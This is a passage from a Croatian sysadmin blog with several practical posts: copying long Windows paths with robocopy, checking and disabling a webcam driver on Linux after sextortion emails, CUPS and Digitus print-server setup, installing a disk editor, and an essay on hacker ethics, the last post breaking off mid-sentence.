/r – obrnuto sortiranje Z-A (reverse sort)
/+250 - 250 i više znakova
/o – sprema izlaz naredbe u navedenu datoteku

Datoteku s ispisom smo učitali u program Notepad++ i na samom vrhu se nalazi naša najduža putanja "D:\KopijeDokumenata\Dokument1......." s ostalim ispisom mapa i datoteka. Ovim načinom smo si olakšali posao kod kopiranja dokumenata, jer sad točno znamo koje putanje neće biti uspješno kopirane. Umjesto ponovnog kopiranja, sad se možemo usredotočiti samo na one s najdužim putanjama.

Iz popisa vidimo koja je to najduža putanja koja nije kopirana tj. prelazi granicu od 260 znakova. Za njezino kopiranje koristit ćemo iz naredbenog retka, naredbu "robocopy" koja ovaj problem bezbolno rješava.

Naredba "robocopy" sastavni je dio Windows 7 i novijih Windows operacijskih sustava. Ako kojim slučajem netko radi s Windows XP onda je dovoljno s Interneta preuzeti robocopy.exe, a nikakva instalacija nije potrebna.

Sintaksa naredbe:

"robocopy IZVOR CILJ /PARAMETRI"

Popis prekidača i mogućnosti "robocopy" možete izlistati s naredbom:

robocopy /? | more

U našem primjeru kopirat ćemo mapu KopijeDokumenata na "D:" particiji u mapu Documents također na "D:" particiji i koristit ćemo prekidač /E za kopiranje podmapa i praznih direktorija.

Nakon što smo potvrdili naredbu slijedi kopiranje onoga što Windows Explorer nije mogao:

Na samom kraju vidimo statistiku što je kopirano (koliko mapa, datoteka, vrijeme itd.) i naravno sada možemo vidjeti da je kopiranje uspješno izvršeno.

čet, 2018-10-25 20:03 - Zdravko Rašić

Kuharice:

Windows

Vote:

No votes yet

story_tag:

path too long

CCERT i MUP upozoravaju građane na ucjenjivačke mailove koji u zadnje vrijeme stižu u sandučiće e-pošte. Napadači plaše primatelje tvrdnjom da im je korisnički račun provaljen, da su uhvaćeni u nečasnoj radnji, a javno poniženje će izbjeći ako uplate neku sumu.

I mene su, kao i druge sistemce, zvali korisnici i znanci, pitali što da rade? Savjetovao sam im neka najprije promijene password, za svaki slučaj. I inače je zdravo mijenjati ga povremeno. Nakon toga neka incident prijave davatelju usluga. Znanac je nazvao HT, prijavio ucjenu i zamolio da mu promijene zaporku. Dobio je odgovor da su dobili mnoštvo prijava, ali se ne treba uzrujavati, opasnost nije stvarna. Mailove šalje virus, a password ne treba mijenjati jer račun nije provaljen. Ako ispravno tumačimo, ispada da se "virus" na mail serveru dočepao mail adresa i slao korisnicima poruke. Znanac je dobio mail u kojem je on sam pošiljatelj i primatelj, što bi trebalo biti dokaz da mu je račun provaljen. Ali čemu savjet tehničke podrške da ne treba mijenjati zaporku? Je li to samo lijenost, ne da im se?

Mediji su popratili zbivanja, pa tako čitamo bombastične naslove: "Gledate li pornografiju? Građani prijavili ucjenjivačke e-mailove." Jedan od načina ucjenjivanja jest prijetnja da je pomoću video kamere na računalu korisnik snimljen dok je gledao porniće, a napadač će objaviti snimku na društvene mreže ako mu se ne pošalje novac.

Većina korisnika uopće ne razmišlja o kameri na vrhu ekrana. Ona se aktivira pomoću aplikacije koju sami pokrenemo. Moguće je da kameru aktivira i malware kojeg smo ne znajući pokupili. Kako provjeriti je li kamera aktivna, kad nam se ništa ne pokazuje na ekranu?

Sistemac koji koristi Linux može to lako provjeriti. Pogledajmo koje su datoteke otvorene, možda neke od njih imaju veze s videom.

$ sudo lsof | grep video
lsof: WARNING: can't stat() fuse.gvfsd-fuse file system /run/user/1000/gvfs
      Output information may be incomplete.
nautilus  1883                hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
gmain     1883 1932           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
gdbus     1883 1933           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
dconf\x20 1883 1969           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0

Izlistane su samo biblioteke, srećom nema aplikacije koja te biblioteke koristi. Utješno, znači da nas nitko ne snima! :)

Upozorenje koje kaže da lsof ne može pristupiti gvfsd file sistemu je razumljivo jer tom tipu datotečnog sustava može pristupiti samo njegov vlasnik, a root to nije! Ako želite zaviriti i tamo, izostavite sudo prije lsof.

$ lsof | grep video
nautilus  1883                hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
gmain     1883 1932           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
gdbus     1883 1933           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
dconf\x20 1883 1969           hombre  mem       REG                8,2    545656    4072114 /usr/lib/x86_64-linux-gnu/libgstvideo-1.0.so.0.803.0
unity-sco 4975                hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
dconf\x20 4975 4976           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
gmain     4975 4977           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
gdbus     4975 4978           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
unity-sco 4986                hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
dconf\x20 4986 4991           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
gmain     4986 4992           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo
gdbus     4986 4993           hombre  mem       REG                8,2      2430    5118848 /usr/share/locale-langpack/hr/LC_MESSAGES/unity-lens-video.mo

Sad se pojavio unity-lens, što je opet sastavni dio OS-a, odnosno Unity desktopa. "Leće" nam ubrzavaju traženje sadržaja po vrsti datoteke (glazba, video, torrenti itd.) na računalu, ali i na webu, ukoliko uključimo takvu vrstu pretraživanja u postavkama. Dakle, opet ništa sumnjivao.

List open filesće nam pomoći u traženju otvorenih datoteka, ali korisnik bi morao biti paranoičan i stalno provjeravati da li mu neka aplikacija koristi kameru. Možemo li problem riješiti "sistemski", tako da možemo opuštenije koristiti računalo?

Potražimo aktivne module kernela. Za to će nam poslužiti naredba lsmod.

$ sudo lsmod | grep video
uvcvideo               86016  0
videobuf2_vmalloc      16384  1 uvcvideo
videobuf2_memops       16384  1 videobuf2_vmalloc
videobuf2_v4l2         24576  1 uvcvideo
videobuf2_core         40960  2 uvcvideo,videobuf2_v4l2
videodev              180224  3 uvcvideo,videobuf2_core,videobuf2_v4l2
media                  40960  2 uvcvideo,videodev
video                  45056  1 i915

Modul video donosi podršku za Intelove grafičke čipove, dok moduli uvcvideo omogućavaju rad kamerama napravljenim po UVC standardu.

Ako ne želimo stalno provjeravati rad kamere, najbolje je maknuti uvcvideo module.

$ sudo modprobe -r uvcvideo

Pogledajmo da li su svi uklonjeni

$ sudo lsmod | grep video
video                  45056  1 i915

Dobro je, ostao je aktivan samo modul koji podržava grafički čip. Radoznalosti radi, pokušavamo i njega "ugasiti".

$ sudo modprobe -r i915
modprobe: FATAL: Module i915 is in use.

Dobro da brzopleti prsti nisu uspjeli u nakani. i915 je driver za Intelov grafički čip. Maknuti i njega bilo bi riskantno, zar ne? Izgubili bismo sliku na ekranu..

Ali što će se dogoditi nakon restarta? Pogađate, svi će moduli opet biti aktivni. Pitanje je da li smo toliko paranoični da ih želimo zauvijek ukloniti? Mislim da bi to bilo pretjerano. Bit će dovoljno dodati redak u neku startup skriptu da se moduli za kameru deaktiviraju automatski. Za to može poslužiti .bashrc u home direktoriju, ili, još bolje, /etc/rc.local. Tu će trebati upisati cijelu putanju do naredbe:

# Isključi drivere za video kameru
/sbin/modprobe -r uvcvideo

Na taj način će se moduli pokrenuti, ali prije nego se korisnik ulogira bit će uklonjeni, pa ne moramo brinuti o kameri. Ako želimo sudjelovati u nekoj video komunikaciji, dovoljno ih je aktivirati.

$ sudo modprobe -a uvcvideo

I to je to! Digli smo letvicu potencijalnom napadaču, neće moći samo tako koristiti kameru na vrhu ekrana.

Istina, "zdravo seljačka" metoda bila bi jednostavno zalijepiti izolir traku preko kamere - viđali smo to kod korisnika koji su spretniji s rukama nego s glavom. Ali to smo odbacili, jer će nakon uklanjanja ostati ljepljiva prljavština preko leće.

sub, 2018-10-27 17:45 - Aco Dmitrović

Kuharice:

Vote:

No votes yet

story_tag:

kamera

uvcvideo

U našim uvjetima poslovanja često je kod kupovanja PC periferije presudna cijena. Zbog sve manjih budžeta, često se traži da se kupi što jeftinija oprema, ali se naknadno to jeftinije često pokaže skuplje. Zapravo, za mirnu budućnost uvijek je bolje gledati skuplje rješenje. U našem primjeru, pri kupovini printera za računalo iz referade cijenom je bio najprihvatljiviji Samsung Mono Laser USB. Druge namjene osim printanja s računala se nisu spominjale. Mrežni printer postoji u drugom uredu gdje se printaju radni materijali i sigurno nije dobro da potvrde sa osobnim podacima studenata nađu u snopu sa nekim testovima za ispit. USB printer će se koristiti samo za dokumente vezane uz referadu i trebaju ostati u referadi do uručenja.

U međuvremenu se zaključilo da bi studentske potvrde mogao ispisivati print server za ISVU, te tako smanjiti gužvu na šalteru referade. Eh, sad bi dobro došla opcija mrežnog printera, no kupljen je printer samo s USB priključkom. Stalno upaljeno računalo u referadi kao server nije nam opcija. Prvi mono laser model s mrežnim priključkom je oko 1000 kn. Isto tako, postojeći mrežni printeri nisu opcija da dokumenti sa osobnim podatcima završe na nečijem stolu za koga to nije namijenjeno (GDPR). Samsung USB printer je još relativno "nov" i uloženo je u kupovinu novog bubnja, čini se isplativo potražiti neko do it yourself rješenje.

Pa idemo potražiti low budget print server i što se u tom pogledu nudi. Na pamet nam pada Raspberry Pi i neki linux print server. Kada zbrojimo računalnu ploču, kućište, napajanje i SD karticu iznos se penje preko 500 kn. Da li se može koristiti za namjenu ISVU printanja? Ne znamo, pa moramo testirati. Za tu namjenu će poslužiti Cubietruck, kojega smo već opisivali u člancima. Kako su Armbian i Raspbian bazirani na Debian Stretchu, konfiguracija i rad servera bi bili identični. Krenimo s testiranjem.

Pokrenuli smo Armbian.

  ____      _     _      _                   _    
 / ___|   _| |__ (_) ___| |_ _ __ _   _  ___| | __ 
| |  | | | | '_ \| |/ _ \ __| '__| | | |/ __| |/ / 
| |__| |_| | |_) | |  __/ |_| |  | |_| | (__|   <  
 \____\__,_|_.__/|_|\___|\__|_|   \__,_|\___|_|\_\                                     
Welcome to ARMBIAN 5.38 stable Debian GNU/Linux 9 (stretch) 4.14.15-sunxi    
System load:   0.22 0.21 0.14      Up time:       9 min         
Memory usage:  2 % of 2011MB     IP:            192.168.1.85 
CPU temp:      28°C         
Usage of /:    18% of 7.3G       
[ 0 security updates available, 45 updates total: apt upgrade ]
Last check: 2018-04-19 12:14 
[ General system configuration (beta): armbian-config ] 
Last login: Thu Apr 19 12:13:37 2018 from 192.168.88.71

Instaliramo CUPS/Printer sharing server, koji prema dokumentaciji može posluživati Windows klijente kao npr. naš ISVU printer ili računalo iz referade.

#apt-get install cups

Da naš server sluša zahtjeve sa drugih računala zakomentiramo retke za localhost i dodamo u /etc/cups/cupsd.conf kao u našem primjeru dio.

#Listen localhost:631
#Listen Port 631
Listen 192.168.1.85:631

Restartamo cups server i provjerimo koji su portovi otvoreni.

$nmap 192.168.1.85 
Starting Nmap 5.21 ( http://nmap.org ) at 2018-11-05 11:09 CET 
Nmap scan report for 192.168.1.85 
Host is up (0.0014s latency). 
Not shown: 998 closed ports 
 PORT    STATE SERVICE 
  22/tcp  open  ssh 
  631/tcp open  ipp

Pokrenemo administratorsko sučelje na adresi https://192.168.1.85:631/admin/ i prijavljujemo se kao root korisnik Debian sustava. Cups server prepoznaje sve mrežne printere na lokalnoj mreži.

Add Printer 
Add Printer
Local Printers:     Serial Port #1  
Serial Port #3  
Discovered Network Printers:     
   NRG MP 2501 (NRG MP 2501)
   RICOH Aficio MP 301 (RICOH Aficio MP 301) 
   HP LaserJet Professional P1606dn (HP LaserJet Professional P1606dn) 
   NRG MP 2001 (NRG MP 2001)

Other Network Printers:     Internet Printing Protocol (ipp) 
Backend Error Handler 
Internet Printing Protocol (ipps) 
Internet Printing Protocol (ipp14) 
Internet Printing Protocol (http) 
LPD/LPR Host or Printer 
AppSocket/HP JetDirect 
Internet Printing Protocol (https)

Priključimo 2 USB printera na Cubietruck, te ih preko Cups Administration s Add Printer poslužimo preko mreže, kako bi ih mogli testirati. Na adresi https://192.168.1.85:631/printers imamo:

Nakon toga jednostavno po dokumentaciji instaliramo printere na Windows klijenta uz pripadne drivere Sharing via IPP protokolom. To sa klijenta ISVU printer servera izgleda ovako:

Printanje tekst datoteka ili nekih drugih dokumenata s Windowsa ide bez problema. No, za ISVU server klijenta i njegovu aplikaciju printeri ne funkcioniraju. Probali smo po uputama unijeti one parametre koje smo pronašli na Windows instalaciji. Očito ti parametri nisu servirani kako bi aplikacija to željela.

Nismo sigurni da naš Linux print server zadovoljava ISVU aplikaciju sa kojom bi trebao komunicirati i odustajemo od daljnjeg testiranja printanja pomoću Samba protokola. Razlog više je jedno gotovo print server rješenje koje ima više-manje pripremljenu konfiguraciju.

O prilagođavanju print servera za naše potrebe više u sljedećem članku.

čet, 2018-11-08 13:02 - Goran Šljivić

Kategorije:

Hardware

Vote:

Vaša ocjena: NemaAverage: 5(1 vote)

story_tag:

server

Informacijska sigurnost je mlada disciplina, nastala sa zadrškom nakon pojave informacijske revolucije. Prvo su razvijene tehnologije kojima su svi bili fascinirani. S pojavom sve brojnijih zloupotreba, javlja se potreba za boljom zaštitom. Informacijska je sigurnost isprva neka vrsta naknadne pameti, neprestano ispravljanje već napravljenog. Sve dok se ne dostigne kritična masa loših iskustava koja će proizvesti promjenu, što bi u ovom slučaju značilo ugrađivanje zaštite već pri dizajniranju proizvoda.

U svijetu se koristi sve više umrežene računalne opreme, život i rad više nisu mogući bez računala (mobitela, servera, osobnih računala, satova, nadzornih kamera, umreženih senzora - lista je otvorena...). U isto vrijeme ranjivosti se otkrivaju svakodnevno. Provaljivanje više nije hobi golobradih klinaca željnih dokazivanja, već ozbiljan posao kojim se bave kriminalci s jedne strane, a obavještajci koji rade za države s druge. Mogli bi tu ubaciti i korporativnu špijunažu, jer tvrtke žele znati što radi konkurencija. Što je nekad bila zabava, sad je ozbiljan posao. U igri su novac, moć, politički interesi. A nasuprot "zločestim dečkima" su "dobri dečki", etički hakeri. Ovdje se već nazire dvojnost svojstvena ljudskoj prirodi, pa prema tome neizbježno i hakerima. I oni mogu biti dobri i loši dečki. Nema znanstvenog istraživanja koje bi nam otkrilo koji je postotak hakera u kojem taboru, ali pretpostavljam da bi omjer bio isti kao u bilo kojem drugom zanimanju. Mada, radi važnosti koju IT revolucija donosi današnjem društvu, vjerojatno možemo s razumnom sigurnošču pretpostaviti da se na njih vrši veći pritisak nego na pripradnike nekih "normalnih", manje zanimljivih zanimanja.

Ovdje se još jednom moramo ograditi od pojma haker kako ga prezentiraju mediji. Haker nije kriminalac! U počecima informacijske revolucije, postojali su odvojeni nazivi za ljude koji zloupotrebljavaju svoja znanja: phreakeri su hakirali telefone (na pr. John Draper koji je pomoću zviždaljke iz zobenih pahuljica zavaravao telefonsku centralu i besplatno razgovarao), crackeri su provaljivali na računala. No ti nazivi nisu prodrli u medije. Zato mi nikad nije teško ponavljati: haker je čovjek izuzetnog znanja iz nekog područja, ali je važno dodati da je nužan sastojak definicije hakera činjenica da se zabavlja i uživa u tome što radi! Dakle haker radi radi zadovoljstva u radu, a ne zbog zarade! Haker nije nužno informatičar - haker u kuhinji je Jamie Oliver. Ipak, kad kažemo haker, najčešće mislimo na informatičare. Među pionire IT hakera ubrajaju se na primjer Ken Thompson i Dennis Ritchie, koji su, radeći za AT&T, napravili prvu verziju Unixa, mimo znanja uprave i koristeći odbačeno računalo koje su pronašli u podrumu. Akademski hakeri dali su velik doprinos razvoju otvorenih standarda i Interneta. Stvorili su kulturu otvorenosti, suradnje i zajedničkog razvoja. Jedan od njih je Richard Stallman, pokretač Fondacije za slobodni softver (FSF, Free Software Foundation). Cilj je tog pokreta proizvesti softver koji mogu koristiti siromašni koji si ne mogu priuštiti kupovinu komercijalnog softvera. Koristeći slobodan softver, ne moraju kršiti Zakon o zaštiti autorskih prava! Ali taj pokret je prerastao prvotne namjere, dobio je globalni zamah koji oslobađa kreativnost bezbrojnih talentiranih pojedinaca dajući im svrhu i konkretne zadatke. Svaki mali doprinos dobro je došao, a korištenje i razvijanje slobodnog softvera je više od štednje, već je i otpor korporativnoj dominaciji.

Kao dobar primjer dvojnosti pozvao bih se na epizodu serije Elementary. (Sherlock Holmes, genijalni detektiv, prebačen u suvremeni New York.) Vatrogasci u izgorenoj zgradi pronalaze leš muškarca japanskog porijekla. Koža mu je prekrivena tetovažom, nedostaju mu dva prsta na ruci. Radi se o bivšem članu Jakuze, japanske mafije, koji je kao mladi, talentirani informatičar bio prisiljen postati jakuza, točnije sokaija - stručnjak za industrijsku špijunažu i ucjene. Želio je prekinuti s takvim životom, pa je, uz pristanak šefova, otkupio svoju slobodu i ritualno si odrezao još jedan prst, kako bi u mogao živjeti bez straha od progona nekadašnjih kolega, štoviše uz njihovu zaštitu. Dao si je izraditi umjetne prste, od silikona, a u jednog je ugradio USB stick! U SAD je radi svog prethodnog iskustva zarađivao kao konzultant informacijske sigurnosti. Za Ministarstvo obrane provjerava sigurnost računalnog sustava koji treba zamijeniti "legacy" sistem za upravljanje nuklearnim projektilima. No neki smatraju da je stari sustav, koji još koristi 8 inčne diskete, sigurniji jer ga nitko više ne poznaje dovoljno da bi ga znao napasti! Scenaristi serije očigledno koriste dobre konzultante koji razumiju duh vremena!

Treba li reći da je Sherlock haker za zločine?

Kako je danas sve podložno brzoj promjeni, tako se i pojam hakera razvija. Neko je vrijeme, po uzoru na westerne, bilo popularno dijeliti ih na white hat i black hat hakere. Kasnije je podjela usložnjena: uz bijele, koji pomažu u zaštiti, crne, s lošim namjerama, pojavljuje se novi pojam: sivi hakeri, gray hats, koji rade za državu, obavještajne agencije. Neosporno je da su svi oni znalci, razlikuju se samo po tome kome služe. U toj se slici posve gubi ono prvotno amatersko uživanje u poslu. Zato preporučujem svima da pročitaju knjigu Hakerska etika i duh informacijskog doba, Pekke Himanena. Da ne zaboravimo kako je sve počelo, s dobrim namjerama, i da održimo tu pozitivu i kreativnost na životu.

Naš konzultant s USB prstom prošao je sve tri preobrazbe: prisilni black hat uspio se izboriti za svoju slobodu, postao white hat, da bi, radeći za vojsku, počeo nositi sivi šešir! Sherlock isprva rezonira da je na USB presnimio stari vojni softver sa disketa, pa je radi toga ubijen. Na kraju se ispostavi da je posrijedi nešto drugo - nećemo vam otkriti rasplet da vam ne pokvarimo gledanje serije. Uglavnom, jakuza haker je bio pošten.

White hat hakeri nazivaju se i etički hakeri, da se naglasi kako je rezultat njihova rada usmjeren na dobrobit društva. Čak se može polagati ispit za etičkog hakera, dobiti certifikat. Tijekom svoje informatičke karijere imao sam čast upoznati nekolicinu hakera, s certifikatom i bez njega. Dobri dečki, bistri, sposobni, žestoko zaljubljeni u svoj posao, uvijek na krijesti vala, zainteresirani za nove tehnologije. Na konferencijama održe dobro prihvaćena i zanimljiva predavanja, koja prezentiraju uz dozu nadmoćnog humora. Uvijek je s njima zanimljivo, nikad dosadno. Pod uvjetom da razumijete o čemu pričaju, jer su u stanju satima raspravljati o nekim tehničkim začkoljicama jezikom koji je ostatku čovječanstva nerazumljiv.

Kolega s certifikatom etičkog hakera pričao mi je kako je godinama punio disk exploitima koji, nažalost, više ne rade. Vrijedni su i dragocjeni dok se ne objave zakrpe. Nakon toga bezvrijedni su s praktičnog stanovišta, ali ih čuvaju jer se iz njih može nešto naučiti, a vjerojatno će jednom imati i povijesnu vrijednost, kao spomenici prošlosti. Osim toga, nisu svi brzi u instalaciji zakrpa, pa će možda još koji put poslužiti svrsi! U prikupljanje exploita utrošeno je mnogo vremena, znanja, novca. Neki se nude besplatno, ali ih treba znati pronaći, neke dobiješ razmjenom, a neke treba kupiti na darknetu. Etički hakeri i sami traže ranjivosti, objave svaki uspjeh na svom blogu, gradeći svoj profesionalni status, pridobijaju klijente, ali i stvaraju "valutu" za razmjenu. Neki etički hakeri završe na platnoj listi velikih informatičkih tvrtki koje traže talente. Tu ih doslovno udave birokracijom, pisanjem izvještaja, što je krajnja suprotnost hakiranju koje je kreativan posao. S druge strane, tvrtka ulaže u njih, daje im opremu, šalje ih na edukaciju, omogućava im da nastupaju na konferencijama i sami educiraju druge. Neki imaju sreću da dobiju šefa koji razumije da su hakeri drugačija sorta i štite ih od birokracije. U protivnom, najčešće neće dugo izdržati na takvom poslu, otvorit će svoju vlastitu tvrtku, tako da sami sebi budu šef.

U opisu je posla etičkog hakera da stalno traži nove exploite, isprobava ih, a zatim savjetuje klijente kako da se zaštite. U uredu koristi mnoštvo računala. Kad se nabavi exploit, treba ga isprobati na različitim verzijama Windowsa, sa i bez "service packa", sa i bez izdanih zakrpa. Da ne spominjemo različite Unixoide, OSX, iOS, Android... Mnogo posla, a treba biti brz jer proizvođači softvera već pripremaju zakrpe. Ne vrijedi kukati, kad si već odabrao takav posao, treba ustrajati, držati korak. U mlađim danima hakiranje je imalo neku zavodljivu auru, kao da si svećenik s okultnim znanjima koja nisu dostupna običnim smrtnicima. Ali s vremenom se čovjek zamori, toliko truda za nešto što brzo izgubi vrijednost i značenje. Ali potreba za tim znanjima ne prestaje, naprotiv, sve je veća.

Kao što je današnja civilizacija nezamisliva bez računala, tako je nezamisliva bez hakera. Oni su dosad davali svoj pečat razvoju tehnologije, zalažući se za otvorene standarde i slobodan softver, otkrivajući greške u softveru, potičući proizvođače na ispravke. Možete ih unajmiti da vam ispitaju sigurnost vaših sustava, savjetuju vas kako ih poboljšati. Nadam se da će to raditi i ubuduće. Bilo bi žalosno da razvoj ostane samo u rukama korporativnih informatičara, kojima upravljaju profitno orijentirani manageri,. Nadam se također da će ostati živ duh suradnje, otvorenosti i kreativnosti, kojim su obilježili ranu povijest Informacijske revolucije.

uto, 2018-11-13 20:43 - Aco Dmitrović

Kategorije:

(prvi dio članka možete pročitati ovdje)

Vote:

Vaša ocjena: NemaAverage: 5(3 votes)

story_tag:

informacijska sigurnost

hakeri

Istražujući strukturu FAT file systema, spomenuli smo alat kojim možemo proučavati i editirati sadržaj diskova, hex editor pod nazivom Active@DiskEditor. Alat je freeware, čime nam postaje još zanimljiviji, pa je red da se s njime pobliže upoznamo.

Da bi instalirali DiskEditor, skinemo ga s adrese http://www.disk-editor.org, gdje odaberete da li želite verziju za Linux ili Windowse.

Kad izaberemo Linux verziju, dobit ćemo datoteku DiskEditor.tar.gz, što bi značilo da je napravljena tar arhiva koja je zatim komprimirana gzipom. Trebalo bi napraviti dvostruko raspakiravanje, ovako:

# tar xzvf DiskEditor.tar.gz
gzip: stdin: not in gzip format
tar: Child returned status 1
tar: Error is not recoverable: exiting now

Naučeni smo koristiti tar sa xz parametrima, da u jednom potezu obavi unzip i ekstrahira arhivu, ali ovog puta to ne prolazi. Neće proći ni ako pokušamo samo unzip:

$ unzip DiskEditor.tar.gz
Archive:  DiskEditor.tar.gz
  End-of-central-directory signature not found.  Either this file is not
  a zipfile, or it constitutes one disk of a multi-part archive.  In the
  latter case the central directory and zipfile comment will be found on
  the last disk(s) of this archive.
unzip:  cannot find zipfile directory in one of DiskEditor.tar.gz or
        DiskEditor.tar.gz.zip, and cannot find DiskEditor.tar.gz.ZIP, period.

Pa kakva je to onda datoteka?

# file DiskEditor.tar.gz 
DiskEditor.tar.gz: POSIX tar archive

Dakle obična tar arhiva! Čemu onda .gz ekstenzija na kraju imena? Nećemo time razbijati glavu.

$ tar xf DiskEditor.tar.gz

Uspjeh! Dobili smo instalacijsku skriptu, koju možemo odmah pokrenuti:

$ ./DiskEditor_Linux_Installer.run 
Verifying archive integrity...  100%   All good.
Uncompressing Active@ Disk Editor  100%  
[sudo] lozinka za hombre: 
Installed /tmp/selfgz3025/lib to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/plugins to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/DiskEditor to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/DiskEditor.sh to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/DiskEditor.pdf to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/license.txt to /opt/lsoft/DiskEditor
Installed /tmp/selfgz3025/DiskEditor.png to /usr/share/pixmaps
Installed /tmp/selfgz3025/DiskEditor.desktop to /usr/share/applications
Installation completed successfully [Installer version: 1.1]

Skripta je napravila direktorij /opt/lsoft/DiskEditor, i u njega smjestila DiskEditor, a u dva poddirektorija biblioteke i pluginove. Tu je i slikica u /usr/share/pixmaps, i druga u /usr/share/applications. Klik na nju pokrenut će DiskEditor.

Iako nismo instalirali .deb paket, instalacijska skripta obavila je sve što treba da sustav može pronaći i pokrenuti aplikaciju. Na Ubuntuu sam je povukao u launcher, među najčešće korištene aplikcije.

Klik na ikonu nalik na neki stari pergament pokareće skriptu koja starta aplikaciju. Najprije se traži password kako bi mogli raditi s admin ovlastima, potrebnim za pristup diskovima.

Kad upišemo ispravan password, pojavljuje se početni ekran. Pod Getting Stared nudi se otvaranje diska, otvaranje datoteke, ottvaranje slike diska (ovo će obradovati forenzičare, koji mogu raditi istragu na bitcopy preslici diska), i na kraju neka vrsta File Explorera za pretraživanje sadržaja diskova. Pod Support moći ćete proučiti dostupnu literaturu i upute za korištenje, lokalne i online. Trebalo bi se najprije toga prihvatiti, po RTFM metodi, zar ne? Ali znate kako to ide, ako ne ide drukčije, pročitaj fine upute.

Za prvi put odaberimo Explore My Computer.

Nude se dva diska s svojim particijama. sda je u ovom slučaju SSD disk notebooka, dok je sdb USB stick sa FAT particijom. Razlikujemo ih po tome što SSD ima GUID tablicu particija, a USB dobri stari Master Boot record.

Tu odaberete jedan od diskova ili neku od partcija, ovisno o tome što vas zanima. Nakon toga smo spremni za daljnjje istraživanje. No treba biti oprezan, jer nasumično čeprkanje po "živom" disku može imati neželjene posljedice. Zasad ćemo se od toga uzdržati, do narednog nastavka.

pet, 2018-11-30 21:35 - Aco Dmitrović

Kategorije:

Software

Vote:

No votes yet

story_tag:

disk editor

Printer icon Pronašli smo uređaj Digitus FE Print Server, LAN, USB, DN-13003-1 koji je "pali i vozi" rješenje, ali cijenom oko 300 kn još više smanjuje budžet. Teško je donijeti odluku o kupovini bez testiranja uređaja, ali idemo logikom da uređaj može dobro doći za neku drugu namjenu ukoliko ne proradi kao ISVU printer. Printer koji imamo, Samsung M2625,se nalazi na popisu podržanih modela, pa nabavljamo uređaj Digitus i krećemo s testiranjem. Brzinskim proučavanjem dokumentacije pronalazimo web sučelje za administraciju uređaja. To je ujedno najlakši i najbrži način upravljanja. Mijenjamo orginalne IP postavke i podešavamo ih na našu lokalnu mrežu. Prijavljujemo se na sučelje uređaja.

Nakon spajanja USB printera dobivamo informaciju o prepoznavanju našeg printera. Čini se da stvar funkcionira.

Print Server
Status     Setup     Misc     Restart
System     Printer     TCP/IP     NetWare     AppleTalk     SNMP     SMB     
This page displays the information of the printer which is currently connected to the print server.
Note: If your printer does not support bi-directional function, some information may not be displayed correctly.

Printer Information 
Manufacturer     Model Number     Printing Language Supported     Current Status 
Samsung      M262x 282x Series      SPL,URF,PIC,SPDS,FWV,EXT     Waiting for job

U SMB postavkama nalazimo da je naš Samsung M2625 podijeljen za Windows klijente pod imenom LP1.

Print Server
Status     Setup     Misc     Restart
System     Printer     TCP/IP     NetWare     AppleTalk     SNMP     SMB     
This page displays the printer sharing settings for Microsoft Windows networks.
Workgroup Name: WORKGROUP
Shared Name Printer: LP1

Na printer se jednostavno spojimo upisivanjem lokacije \\LP1 ili \\IP_uređaja. Nakon spajanja na uređaj treba jednostavno kroz browse potražiti pripadajuće drivere od USB printera Samsung M2625. Nakon instalacije drivera, printanje preko mreže putem SMB protokola radi sa Windows klijenata, ali ne radi u slučaju ISVU aplikacije koja dalje odbija komunicirati putem SMB protokola. Postavlja se pitanje što ISVU print aplikacija želi posluženo?

Potrebna 3 podatka su name, driver, port (lpt, comm, usb, samostalna IP adresa). Sugerira se da je u većini slučajeva kod instalacija na Windows parametar name i driver jednak podatak. Nama su vrijednosti različite, a sam port ne odgovara ni jednom od ponuđenih slučajeva. Ne vidimo načina da se ovako instaliran printer koristi preko ISVU print servera. Postavlja se pitanje može li se Samsung driver instalirati putem "čiste"IP adrese uređaja umjesto da komunicira USB portom? To nam se čini kako opcija putem koje bi ISVU printer aplikacija prepoznala printer.

Pregled portova print servera nam pokazuje:

linux$ nmap 192.168.1.174 
Starting Nmap 6.47 ( http://nmap.org ) at 2018-11-05 12:21 CET
Nmap scan report for 192.168.1.174
PORT     STATE SERVICE
23/tcp   open  telnet
80/tcp   open  http
139/tcp  open  netbios-ssn
515/tcp  open  printer
9100/tcp open  jetdirect

Zapravo otvoren 9100/tcp dozvoljava Raw TCP/IP printing koji se u Windows nalazi pod nazivom Standard TCP/IP port. Samo imamo problem što USB printer driver nije predviđen da traži instalaciju na Standard TCP/IP port. Takva bi logika stvari bila. Međutim zašto ne probati nelogičnim putem :) Samsung Xpress SL-M2625D Printer Print Driver 3.13.12.00:22 se vodi kao Interface: Hi-Speed USB 2.0. Ali "budimo realni - tražimo nemoguće". Instalacija driver imena M262x_282x_Series_WIN_SPL_PCL_V3.13.12.00.22.exe završava ovako:

